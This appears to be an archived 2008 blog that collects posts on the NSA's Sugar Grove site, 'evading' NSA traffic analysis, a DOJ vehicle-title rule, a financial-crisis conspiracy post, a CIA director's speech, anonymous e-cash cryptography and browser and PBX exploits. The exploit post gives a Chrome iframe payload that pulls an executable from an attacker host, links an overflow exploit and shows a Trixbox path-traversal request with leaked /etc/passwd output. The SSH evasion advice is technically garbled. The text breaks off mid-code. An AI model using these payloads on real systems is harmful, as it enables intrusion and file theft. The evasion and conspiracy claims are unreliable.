Secrets of Sugar Grove

Sugar Grove is an American government communications site located in Pendleton County, West Virginia (38.514997, -79.28421), operated by the National Security Agency. According to a December 25, 2005 article in the New York Times, the site intercepts all international communications entering the Eastern United States.

The site was first developed by the Naval Research Laboratory in the early 1960s as the site of a 600 ft radio telescope that would gather intelligence on Soviet radar and radio signals reflected from the moon and would gather radioastronomical data on outer space, but the project was halted in 1962 before the telescope construction was completed. The site was then developed as a radio receiving station. The site was activated as “Naval Radio Station Sugar Grove” on May 10, 1969, and two Wullenweber Circularly Disposed Antenna Arrays (CDAAs) were completed on November 8, 1969. Numerous other antennas, dishes, domes, and other facilities were constructed in the following years. Some of the more significant radio telescopes on site are a 60 ft dish (the oldest telescope on site), a 105 ft dish featuring a special waveguide receiver, and a 150 ft dish (the largest telescope on site).



Though the CDAAs were decommissioned in the 1990s, the site is still active, and photographs taken between 2000 and 2004 show significant construction on the site.

The site is part of the ECHELON communications network operated by the United States and its allies to intercept and process electronic telecommunications. The network operates many sites around the world including Waihopai Valley in New Zealand, Menwith Hill in the United Kingdom and Yakima, Washington.

Sugar Grove is located in an officially designated National Radio Quiet Zone that covers 13,000 square miles in West Virginia and Virginia. The zone was established by Congress in 1958 to facilitate its mission and that of the National Radio Astronomy Observatory located 30 miles away at Green Bank in Pocahontas County, West Virginia.

The small community of Sugar Grove is located several miles south of the installation. Its ZIP Code is 26815.





Posted on Sun, Oct 5, 2008 by John Jolly

Evading the NSA TCP/IP Traffic Analysis Program

The NSA TCP/IP traffic analysis program primarily focuses on the traffic analysis of WAN ATM (Asynchronous Transfer Mode) cell header and payload data at IXPs (Internet Exchange Points) globally that employ Cisco Systems routing equipment.

Concerned persons should implement the following:
  1. If possible, ensure that your network routing equipment’s ATM switched virtual connections and permanent virtual connections are disabled; AND
  2. Tunnel your TCP/IP connections over a new SSH2 session for each and every new WAN TCP/IP routed connection (for EVERY transmission to any WAN address); AND
  3. Create transmission latency for each of your new WAN SSH2-enabled TCP/IP routed connections through a modified SSH login command such as:

ssh -N -L 6000:localhost:4000 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 
-l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4

Note that localhost is on port 6000 and remote web host proxy is on port 4000; username is User (if using SSH user authentication); and remote SSH server IP is 1.2.3.4; transmission latency is created with multiples of -l User 1.2.3.4.

More to follow on creating transmission latency when using remote port forwarding through OpenVPN.

If your server traffic is a specific collection target of NSA/Level 3 Communications Regional Security Center (NSA/CSS Georgia) at Fort Gordon Georgia USA or of one of NSA’s non-US affiliates, flagging of sniffed IXP traffic for subsequent analysis can only be triggered by your server’s SECOND or subsequent routing connection to one or more WAN addresses.

Perhaps surprisingly, if your server’s traffic is a collection target, your users’ use of the above SSH transmission latency will also actually increase users’ upload and download speeds during SSH2 sessions.
Posted on Tue, Sep 30, 2008 by John Jolly

National Motor Vehicle Title Information System (NMVTIS)

DEPARTMENT OF JUSTICE

28 CFR Part 25

[Docket No. FBI 117; AG Order No. 3000-2008]
RIN 1110-AA30


National Motor Vehicle Title Information System (NMVTIS)

AGENCY: Department of Justice.

ACTION: Proposed rule.

———————————————————————————————————-

SUMMARY: The National Motor Vehicle Title Information System (NMVTIS)
has been established pursuant to 49 U.S.C. 30502 and is in operation,
or partial operation, in at least 25 states. NMVTIS is intended to
provide authorized recipients with instant and reliable access to motor
vehicle titling information maintained by the states. The goal of
NMVTIS is to assist in efforts to prevent the introduction or
reintroduction of stolen motor vehicles into interstate commerce.
NMVTIS helps state titling agencies by verifying motor vehicle and
title information, information on brands applied to motor vehicles, and
information regarding whether motor vehicles have been reported stolen.
This rule implements the NMVTIS reporting requirements imposed on junk
yards, salvage yards, and insurance carriers pursuant to 49 U.S.C.
30504(c). This rule also clarifies the process by which NMVTIS will be
funded and clarifies the various responsibilities of the operator of
NMVTIS, states, junk yards, salvage yards, and insurance carriers
regarding NMVTIS.

DATES: Written comments must be submitted on or before November 21,
2008.

ADDRESSES: Comments may be mailed to: James Landon, 935 Pennsylvania
Ave., NW., Washington, DC 20535. To ensure proper handling, please
reference FBI Docket No. 117 on your correspondence. You may submit
comments electronically or view an electronic version of this proposed
rule at http://www.regulations.gov.

FOR FURTHER INFORMATION CONTACT: David P. Lewis, 810 7th Street, NW.,
Washington, DC 20531, 202-616-6500.

SUPPLEMENTARY INFORMATION:

Posting of Public Comments

Please note that all comments received are considered part of the
public record and made available for public inspection online at
http://www.regulations.gov. Such information includes personal identifying
information (such as your name, address, etc.) voluntarily submitted by
the commenter.
If you want to submit personal identifying information (such as
your name, address, etc.) as part of your comment, but do not want it
to be posted online, you must include the phrase “PERSONAL IDENTIFYING
INFORMATION” in the first paragraph of your comment. You also must
locate all the personal identifying information you do not want posted
online in the first paragraph of your comment and identify what
information you want redacted.
If you want to submit confidential business information as part of
your comment but do not want it to be posted online, you must include
the phrase “CONFIDENTIAL BUSINESS INFORMATION” in the first paragraph
of your comment. You also must prominently identify confidential
business information to be redacted within the comment. If a comment
has so much confidential business information that it cannot be
effectively redacted, all or part of that comment may not be posted on
http://www.regulations.gov.
Personal identifying information and confidential business
information identified and located as set forth above will be placed in
the agency’s public docket file, but not posted online. If you wish to
inspect the agency’s public docket file in person by appointment,
please see the FOR FURTHER INFORMATION CONTACT paragraph.

Background

The Anti-Car Theft Act of 1992 (Pub. L. 102-519) required the
Department of Transportation (DOT) to establish an information system
intended to enable states and others to access automobile titling
information. As part of the Anti-Car Theft Act of 1992, DOT was
authorized to designate a third party to operate the system. Since
1992, the American Association of Motor Vehicle Administrators (AAMVA)
has acted in the capacity of the operator of the system. AAMVA is a
nonprofit, tax exempt, educational association representing U.S. and
Canadian officials who are responsible for the administration and
enforcement of motor vehicle laws. The requirements of the Anti-Car
Theft Act of 1992 were amended by Public Law 103-272 and the Anti-Car
Theft Improvements Act of 1996 (Pub. L. 104-152). The Anti-Car Theft
Improvements Act of 1996 renamed the automobile titling system the
“National Motor Vehicle Title Information System” (NMVTIS) and
transferred responsibility for implementing the system from DOT to the
Department of Justice (hereinafter, the Anti-Car Theft Act of 1992 and
the revisions made by Public Law 103-272 and the Anti-Car Theft
Improvements Act of 1996, codified at 49 U.S.C. 30501-30505, are
collectively referred to as the “Anti-Car Theft Act”).
The purpose of NMVTIS is to provide an electronic means for
verifying and exchanging title, brand, and theft data among motor
vehicle administrators, law enforcement officials, prospective
purchasers, and insurance carriers.\1\ To date, the implementation of
NMVTIS has focused on establishing access by the states and not on
providing access to other authorized users. Currently, 33 states are
actively involved with NMVTIS, representing more than 60 percent of the
U.S. motor vehicle population. Specifically, 13 states are
participating fully in NMVTIS, 12 states are regularly providing data
to the system, and an additional 8 states are actively taking steps to
provide data or participate fully.\2\ States that participate fully in
the system provide data regularly and have the ability to make NMVTIS
inquiries before issuing a new


Posted on Thu, Sep 25, 2008 by John Jolly

U.S. Financial Crisis the Second 9/11?

The failure to connect the dots, dismissal of warnings as unfounded, declarations of unexpected calamity, calls for urgent action by government to prevent greater disaster, insistence that Congress and the Administration must act immediately, frightening secret briefings by those who claim to know what has led to the emergency and what must be done to handle it, public assurances that while the nation is in jeopardy wise heads have a plan for protection, with continuing risk to be borne by all Americans, those responsible for a solution to be trusted in the future even though they failed in their responsibilities to prevent the crisis, and don’t waste time questioning who was responsible for the failure; now is the time to plan for the future.

That the problem is due to the US dropping its guard, being complacent about its superiority, not recognizing threats different from those well-known in political and military terms. And failing to see that a national threat has come from a source that no sensible person could have foreseen, sure a few gloom and doomers raised alarms about incomprehensible financial dealings, but who could believe those obsessed with imaginary hazards to the financial market.

Financial power has shifted from the US to Asia and the Middle East, some say, and who knows, maybe that was the plan — to outfox the US masters of the financial universe who believed that nobody better knew global economics, and no nation could challenge military protection of the US economy.

Since 9/11 the second 9/11 was predicted to happen in a way that could not be anticipated, that its success would depend on bypassing defenses derived from the first 9/11. Not nuclear, biological or chemical, but financial. Why target a few thousands when millions can be harmed using the institutions and technologies invented for global commerce supremacy — hi-jacked airliners a mere test run.

The confused rush to handle the financial crisis with piecemeal reactions developed over a couple of weeks is likely to have been anticipated by attackers to panic their targets while continuing to withdraw funds from US institutions, picking them off one by one, assured that no military countermeasure is possible so long as targets cannot be identified in time to halt the aggression.

Or is there an armageddon military spasm in the offing of wounded warriors unable to pinpoint targets so goes for all in the database of those who invented, inflicted, condoned and avoided punishment for debt WMD.

[Federal Register: September 22, 2008 (Volume 73, Number 184)]

Presidential Documents
___________________________________________________________________

Title 3--
The President

Notice of September 18, 2008

Continuation of the National Emergency With
Respect to Persons Who Commit, Threaten to Commit, or
Support Terrorism

On September 23, 2001, by Executive Order 13224, I
declared a national emergency with respect to persons
who commit, threaten to commit, or support terrorism,
pursuant to the International Emergency Economic Powers
Act (50 U.S.C. 1701-1706). I took this action to deal
with the unusual and extraordinary threat to the
national security, foreign policy, and economy of the
United States constituted by the grave acts of
terrorism and threats of terrorism committed by foreign
terrorists, including the terrorist attacks in New
York, in Pennsylvania, and against the Pentagon
committed on September 11, 2001, and the continuing and
immediate threat of further attacks against United
States nationals or the United States. Because the
actions of these persons who commit, threaten to
commit, or support terrorism continue to pose an
unusual and extraordinary threat to the United States,
the national emergency declared on September 23, 2001,
and the measures adopted on that date to deal with that
emergency, must continue in effect beyond September 23,
2008. Therefore, in accordance with section 202(d) of
the National Emergencies Act (50 U.S.C. 1622(d)), I am
continuing for 1 year the national emergency with
respect to persons who commit, threaten to commit, or
support terrorism.

This notice shall be published in the Federal Register
and transmitted to the Congress.

(Presidential Sig.)

THE WHITE HOUSE,

Washington, September 18, 2008
Posted on Tue, Sep 23, 2008 by John Jolly

CIA Director Hayden Speech at the Los Angeles World Affairs Council

Remarks by Central Intelligence Agency Director Michael Hayden
at the
Los Angeles World Affairs Council

(as prepared for delivery)


Good afternoon. Thanks for that kind introduction, and thank you all for inviting me. It’s a pleasure and privilege to be in Los Angeles and to speak to this Council.
As eventful as the world may be right now, the development that is likely to have the most far-reaching consequences will be a domestic one—the election of a new American president. From the standpoint of the Intelligence Community, it’ll be the first time since 1952 that neither candidate is an incumbent president or vice president. It also will be the first transition since the office of Director of National Intelligence was created, and that will be a new experience for all of us.
CIA is the Community’s executive agent in supporting briefings for Senator McCain and Senator Obama, reflecting our role in producing the President’s Daily Brief. After the election, there will be two daily PDB briefings—one for President Bush and another for the president-elect. The new national security team will be setting up shop, too, so it promises to be a very busy time for everyone involved.
The new administration will be a great opportunity for the Agency. I see it as a chance to demonstrate our expertise and insight into virtually every foreign issue affecting this country. We’ll get to know all our new customers and learn how best to serve them. But our fundamental responsibility—protecting the citizens of this nation—will remain the same.
Today I’d like to talk about how CIA keeps America safe from weapons of mass destruction, particularly the nuclear threat. Meeting that critical challenge has been a core responsibility ever since the Agency’s founding in 1947.
In fact, the very first CIA officer to die in the line of duty had been gathering data on the Soviet nuclear program. Douglas Mackiernan served in the desolate reaches of western China, one of those brave operatives who worked our top intelligence target along the periphery of the Soviet Union.
“Mack,” as he was called, was an MIT physics major conversant in Russian and Chinese, a highly resourceful and perceptive officer who had to work with some pretty basic equipment given the remoteness of his post. His primary tasks were to investigate Moscow’s access to local uranium deposits and report any sign of nuclear testing in Soviet Central Asia.
Mackiernan’s mission was cut short by the rapid western advance of the Chinese Communists after their revolution in 1949. He escaped by setting out on an epic seven-month trek across deserts and mountains. He managed to make it all the way to the frontier of Tibet, where he should have found sanctuary. Tragically, he was shot by Tibetan guards who had not yet received word that an American was coming and that he should be granted safe passage.
Douglas Mackiernan’s story speaks to the dedication and courage our officers have brought to our mission for six decades. CIA has targeted the WMD threat in all its forms, from the massive arsenals of rival nations to the deadly aspirations of terrorists. To say that we’re focused on 21st century challenges doesn’t mean for a second that we’ve forgotten those of the 20th—or that we aren’t looking for the emerging threats of tomorrow.
We closely analyze, as we should and as we must, the WMD and missile programs of countries throughout the world. But as attentive as we are in tracking existing weapons programs, the greater challenge lies in detecting those developing in secrecy. CIA is always watching for signs that states and subnational groups might be taking steps to acquire nuclear, biological, or chemical weapons.
Our mission is made a lot more difficult by the fact that access to sensitive technologies is no longer the exclusive domain of a few advanced nations. Dual-use technologies and scientific experts travel easily in our global economy, making it critical to follow those movements and know the experts.
But because the materials and expertise are so prevalent and have perfectly legitimate applications, the very fact that someone is interested in nuclear, chemical, or biological technology is not enough to prove they are interested in weapons. A WMD program fundamentally centers on political intent.
By that measure alone, there is no greater national security threat facing the United States than al-Qa‘ida and its associates. Bin Ladin has said repeatedly that he considers acquisition of nuclear weapons “a religious duty.” And we know that al-Qa‘ida remains determined to attack our country in ways that inflict maximum death and destruction.
We are fortunate that those with the clearest intent to acquire and use weapons of mass destruction are also the least capable of developing them. But the potential destruction from an improvised nuclear device—no matter how elementary—is so great that all that really matters to CIA is that we know terrorists are determined to use them.
We fight this threat on two fronts—the supply side and the demand side. CIA has a group devoted to identifying, penetrating, and disrupting WMD-related proliferation networks. That group is at the heart of a highly integrated effort, drawing on the expertise of our own analysts and intelligence collectors and their colleagues throughout government. Together with our foreign partners, we account for and help safeguard WMD and related equipment worldwide. We identify the illegal sellers and buyers of technology and expertise. And we use covert action to disrupt illicit transfers.
At the same time, we work—methodically, patiently, tirelessly—to penetrate and destroy terrorist networks. Operating against both ends of the chain is critical to detecting and defeating any nuclear plot against America or our allies.
CIA also focuses on Iran and North Korea, two states whose WMD programs have threatened US interests, regional stability, and international arms control mechanisms like the Non-Proliferation Treaty. North Korea conducted a nuclear test two years ago, and the Intelligence Community judges their program produced enough plutonium for at least a half-dozen weapons. For its part, Iran has the scientific, technical, and industrial capacity to produce nuclear weapons eventually. The question is not of capability, but intent.
A good analyst never presumes anything, least of all the plans of a foreign power. Intelligence officers can only assess capability and intent by starting with a clean slate and working from solid evidence and known behavior. That’s precisely what our Community did last year on Tehran’s nuclear program. The result was the Iran National Intelligence Estimate released in November.
The Iran NIE has had its share of criticism, which is typically what happens with a rigorous estimate that lays out what we know and don’t know about a highly contentious issue. It’s detailed, thorough, and—quite frankly—it’s courageous. We don’t have time to delve into the full scope of its findings, but here, very briefly, are the major judgments:
  • Until the fall of 2003, elements of Iran’s military were working to develop nuclear weapons and a warhead capable of delivering such weapons.
  • Tehran halted these efforts probably due to international scrutiny and exposure of previously undeclared nuclear work. We assessed that the nuclear weapons program had not resumed as of mid-2007, a conclusion that subsequent intelligence still supports.
  • And finally, Tehran at a minimum is keeping open its option to develop nuclear weapons.
What leads us to this last judgment? Again, it’s a matter of working back from actions. Why are they pushing forward with the uranium enrichment process at Natanz? They say it’s for civilian purposes, and yet they’ve rejected international offers of fissile material under proper controls.
Iran’s behavior, coming as it does after years of nuclear activity they concealed and continue to deny, invites nothing but suspicion. Why are they slow-rolling the International Atomic Energy Agency by not being forthcoming? And why are they willing to defy the United Nations and pay such a heavy price in terms of international isolation?
Those questions sound familiar. One could argue that Iraq under Saddam was just as confrontational and ultimately lacked the weapons we thought were there. But Iran’s leaders saw what happened to Saddam, and still they reject every opportunity to come clean with the world.
North Korea also poses a broad and complex challenge to global arms control. In fact, the WMD problem in Iran is compounded to no small degree by Tehran’s collaboration with North Korea on ballistic missiles.
Pyongyang’s WMD programs present a double threat. As part of North Korea’s arsenal, they endanger the peace and stability of northeastern Asia. As a source of global proliferation, they have been without equal since a joint operation with our British partners took down A.Q. Khan earlier this decade. Like Khan, whose network had been the world’s most dangerous black market supplier of nuclear technology, North Korea asks only two things of its customers: first, can they pay, and second, can they keep a secret.
Thanks to some outstanding intelligence work, we were able last year to spoil a big secret, a project that could have provided Syria with plutonium for nuclear weapons. I’d like to cover it here because it’s an excellent example of how CIA and our Community colleagues attack the problem of nuclear proliferation.
It was reported in the press last April, and you’re probably familiar with its outlines. We knew that North Korea and Syria had been cooperating since the late 1990s in the nuclear field. The depth of that relationship was revealed in the spring of last year, when we identified a nuclear reactor at Al-Kibar in the eastern desert of Syria. It was similar to the one at Yongbyon in North Korea, but with its outer structure heavily disguised.
The situation became critical late last summer, when we judged the facility could be nearing operation. The Al-Kibar reactor was destroyed the morning of 6 September 2007. The Syrians immediately cleared away the rubble and every trace of the building, stonewalling the IAEA when asked to explain. Their cover-up only underlined the intense secrecy of this project and the danger it had posed to a volatile region.
I want to focus briefly on two important aspects of this intelligence effort: the quality of tradecraft, in terms of collection and analysis, and the value of collaboration, both with colleagues in our government and with foreign services.
More than anything else, our work was a classic example of multidisciplinary, blue-collar analysis. We had a group of officers who started working overtime on this issue in April 2007 and kept at it for months. Virtually every form of intelligence—imagery, signals, human source, you name it—informed their assessments, so that they were never completely dependent on any single channel.
For instance, a report from a foreign partner initially identified the structure at Al-Kibar as a nuclear reactor similar to one in North Korea. But even without that piece of the puzzle, it wouldn’t have been long before we reached the same conclusion. We had previously identified the facility on imagery as a suspicious target. When pipes for a massive cooling system were laid out to the Euphrates River in the spring of 2007, there would have been little doubt this was a nuclear reactor. We would have known it was North Korean, too, given the quantity and variety of intelligence reports on nuclear ties between Pyongyang and Damascus.
Still, our analysts were open to alternative possibilities at every juncture. Early on, they applied a methodology that laid out the inconsistencies in each competing hypothesis. They carefully examined whether the building might be for another purpose, like a conventional power plant, or a water treatment facility. In each case, the arguments simply didn’t add up. The reactor hypothesis was the most difficult to refute with the available evidence.
We then stepped back and tried to turn the basic premise on its head: OK, we’ve got a nuclear reactor in Syria built with North Korean help, but is it necessarily for a Syrian program? Might it have been built by North Korea for its own use, to secretly replace the Yongbyon reactor they had pledged to shut down? We took that hypothesis and worked very hard on it, but the mainstream theory held sway.
Finally, this was a success reached through close collaboration across agencies, departments, and governments. Dedicated officers at CIA, DIA, the Department of Energy, the National Geospatial Intelligence Agency, and NSA came together as a team, each bringing a specific expertise to the table. And this was an intelligence problem that required a wide range of knowledge. I already mentioned all the different forms of collection, but it also drew from a remarkable diversity of analytic firepower—everyone from nuclear technology and weapons experts to political and leadership analysts.
Our foreign partnerships too were critical to the final outcome. These relationships aren’t a matter of occasionally passing along a report that may or may not be useful. They’re more akin to working together on a complex equation over a long period. Each tries to solve a variable that in turn helps a partner solve another, and so on until we’ve cracked the case. That’s what good intelligence is all about.
I hope my remarks today have given you a better idea of how CIA is meeting the counterproliferation challenge. The Intelligence Community as a whole has taken great strides since the pre-war NIE on Iraq to strengthen our tradecraft, and I think it shows with both the Iran estimate and the Al-Kibar effort. The rigor of our sourcing, the emphasis on alternative analysis, and the integration of our expertise with those of our colleagues have never been greater.
By history and law, CIA has more connective tissue to the rest of the Intelligence Community than any other organization. We draw on those deep connections and other unique strengths—in human intelligence collection, all-source analysis, and foreign liaison partnerships—to fulfill a single overriding mission: protecting the American people. That remains the ultimate standard by which we measure our success.
I am tremendously proud of the men and women of CIA. They give far more than they get, and deserve far better than they usually receive. Like Doug Mackiernan before them, today’s CIA officers face the same risks, possess the same spirit, and serve the same cause. They accomplish their mission in ways I’m sure would make you proud, too.
Thank you very much.
Posted on Wed, Sep 17, 2008 by John Jolly

CRYPTOGRAPHY & ANONYMOUS ELECTRONIC CASH

With the onset of the Information Age, our nation is becoming increasingly dependent upon network communications. Computer-based technology is significantly impacting our ability to access, store, and distribute information. Among the most important uses of this technology is electronic commerce: performing financial transactions via electronic information exchanged over telecommunications lines. A key requirement for electronic commerce is the development of secure and efficient electronic payment systems. The need for security is highlighted by the rise of the Internet, which promises to be a leading medium for future electronic commerce.

Electronic payment systems come in many forms including digital checks, debit cards, credit cards, and stored value cards. The usual security features for such systems are privacy (protection from eavesdropping), authenticity (provides user identification and message integrity), and nonrepudiation (prevention of later denying having performed a transaction).

The type of electronic payment system focused on in this paper is electronic cash. As the name implies, electronic cash is an attempt to construct an electronic payment system modelled after our paper cash system. Paper cash has such features as being: portable (easily carried), recognizable (as legal tender) and hence readily acceptable, transferable (without involvement of the financial network), untraceable (no record of where money is spent), anonymous (no record of who spent the money) and has the ability to make “change.” The designers of electronic cash focused on preserving the features of untraceability and anonymity. Thus, electronic cash is defined to be an electronic payment system that provides, in addition to the above security features, the properties of user anonymity and payment untraceability.

In general, electronic cash schemes achieve these security goals via digital signatures. They can be considered the digital analog to a handwritten signature. Digital signatures are based on public key cryptography. In such a cryptosystem, each user has a secret key and a public key. The secret key is used to create a digital signature and the public key is needed to verify the digital signature. To tell who has signed the information (also called the message), one must be certain one knows who owns a given public key. This is the problem of key management, and its solution requires some kind of authentication infrastructure. In addition, the system must have adequate network and physical security to safeguard the secrecy of the secret keys.

This report has surveyed the academic literature for cryptographic techniques for implementing secure electronic cash systems. Several innovative payment schemes providing user anonymity and payment untraceability have been found. Although no particular payment system has been thoroughly analyzed, the cryptography itself appears to be sound and to deliver the promised anonymity.
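The mechanism those anonymous schemes rest on, as an added example that is not code from the surveyed report or from any e-cash product: a blind RSA signature, in which the bank signs a coin it cannot see and later accepts it without being able to link the deposit back to the withdrawal. The key size, the Bank class, the 128-bit serial format and the hash-to-modulus step are assumptions made for illustration only.

```python
"""Blind RSA signature as the core of an anonymous coin (illustrative only)."""
import hashlib
import secrets
from math import gcd

# Toy bank key (assumption). Mersenne primes are used only because they are
# well known; a 92-bit modulus is far too small for anything but illustration.
P = 2**31 - 1
Q = 2**61 - 1
E = 65537


def gen_bank_keys():
    """Return (n, e, d): the bank's public modulus and exponent, and secret d."""
    n = P * Q
    phi = (P - 1) * (Q - 1)
    d = pow(E, -1, phi)          # modular inverse (Python 3.8+)
    return n, E, d


def coin_digest(n, serial):
    """H(serial) reduced mod n: the message that actually gets signed."""
    h = hashlib.sha256(serial.to_bytes(16, "big")).digest()
    return int.from_bytes(h, "big") % n


def new_serial():
    """Random 128-bit coin serial chosen by the user, never by the bank."""
    return secrets.randbits(128)


def blind(n, e, serial):
    """User side: multiply H(serial) by r^e so the bank signs without seeing it."""
    m = coin_digest(n, serial)
    while True:
        r = secrets.randbelow(n - 2) + 2     # 2 <= r <= n-1
        if gcd(r, n) == 1:
            return (m * pow(r, e, n)) % n, r


def bank_sign(n, d, blinded):
    """Bank side: RSA-sign whatever was presented (after debiting the account)."""
    return pow(blinded, d, n)


def unblind(n, blinded_sig, r):
    """User side: divide out r, since (m * r^e)^d = m^d * r (mod n)."""
    return (blinded_sig * pow(r, -1, n)) % n


def verify(n, e, serial, sig):
    """Merchant or bank: check sig^e == H(serial) using only the public key."""
    return pow(sig, e, n) == coin_digest(n, serial)


class Bank:
    """On-line bank: signs blinded coins and keeps a spent-serial list.
    It never sees H(serial) at withdrawal, so a later deposit cannot be
    tied to the account that withdrew it."""

    def __init__(self):
        self.n, self.e, self.d = gen_bank_keys()
        self.spent = set()

    def withdraw(self, blinded):
        return bank_sign(self.n, self.d, blinded)

    def deposit(self, serial, sig):
        if not verify(self.n, self.e, serial, sig):
            return False                  # forged or corrupted coin
        if serial in self.spent:
            return False                  # double spend
        self.spent.add(serial)
        return True


def withdraw_coin(bank):
    """Full withdrawal; returns (serial, sig, blinded) so the caller can
    compare what the bank signed with the coin that is actually spent."""
    serial = new_serial()
    blinded, r = blind(bank.n, bank.e, serial)
    sig = unblind(bank.n, bank.withdraw(blinded), r)
    return serial, sig, blinded


if __name__ == "__main__":
    bank = Bank()
    serial, sig, blinded = withdraw_coin(bank)
    print("coin verifies:", verify(bank.n, bank.e, serial, sig))
    print("bank saw H(serial) at withdrawal:", blinded == coin_digest(bank.n, serial))
    print("first deposit accepted:", bank.deposit(serial, sig))
    print("second deposit (double spend) accepted:", bank.deposit(serial, sig))
```

The spent-serial set is the on-line double-spending check; keeping the blinding factor r on the user's side is what makes the withdrawal record and the deposited coin unlinkable, which is the untraceability property the text defines.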


Posted on Sat, Sep 13, 2008 by John Jolly

Google Chrome Browser 0.2.149.27 Exploits

Google Chrome Browser 0.2.149.27 Automatic File Download Exploit

Description: Google’s new web browser (Chrome) allows files (e.g., executables) to be downloaded to the user’s computer automatically, without any user prompt. This proof of concept was created for educational purposes only and has been successfully tested on Windows Vista SP1 and Windows XP SP3.

Example exploit code:

<script>
// Hidden 0x0 iframe pointing at the payload; Chrome 0.2.149.27 starts the download with no prompt.
document.write('<iframe src="http://www.ph33r.org/evilcodeexe" frameborder="0" width="0" height="0"></iframe>');
</script>

Buffer Overflow Exploit for Google Chrome 0.2.149.27

Description: The vulnerability is caused by a boundary error when handling the “Save As” function. Saving a malicious page with an overly long title (the HTML <title> tag) causes a stack-based overflow and makes it possible for attackers to execute arbitrary code on users’ systems. To exploit the vulnerability, an attacker constructs a specially crafted web page containing malicious code and tricks visitors into saving it. Once the page is saved, the code is executed.

Exploit: http://ph33r.org/storage/exploits-2008/2008-chrome.tar

Trixbox 2.6.1 Remote Root Exploit

A local file inclusion vulnerability affects Trixbox CE, an Asterisk-based PBX phone system. The application fails to sanitize POST data assigned to a parameter of the /user/index.php page. An attacker may leverage this issue to read local files, execute PHP scripts and eventually obtain a root shell.

Vulnerable server-side program: /user/index.php
Vulnerable parameter: langChoice

Proof of concept:


Complete HTTP Request:

POST /user/index.php HTTP/1.1
Host: 192.168.1.107
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

langChoice=../../../../../etc/passwd%00


Complete HTTP Response:

HTTP/1.1 200 OK
Date: Tue, 08 Jul 2008 13:25:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.2
Set-Cookie: PHPSESSID=98b589cad80822c098942d33a1558b9f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
1f4a
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
[…]
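To make the request above concrete, here is an added Python model (not Trixbox’s own PHP) of why the payload works and what a fixed lookup looks like. PHP 5.2 handed include() paths to C, so the trailing %00 cut off whatever extension the script appended, and the five ../ segments climbed out of the language directory. The directory layout, the allow-list and the check_request helper are assumptions; the embedded request is a constructed copy of the one above, not a live capture.

```python
"""Model of the langChoice file-inclusion bug beside a hardened lookup,
plus a check for the traversal/null-byte pattern in a captured request."""
import posixpath
from urllib.parse import parse_qs

LANG_DIR = "/var/www/html/user/lang"       # assumed layout, five components deep
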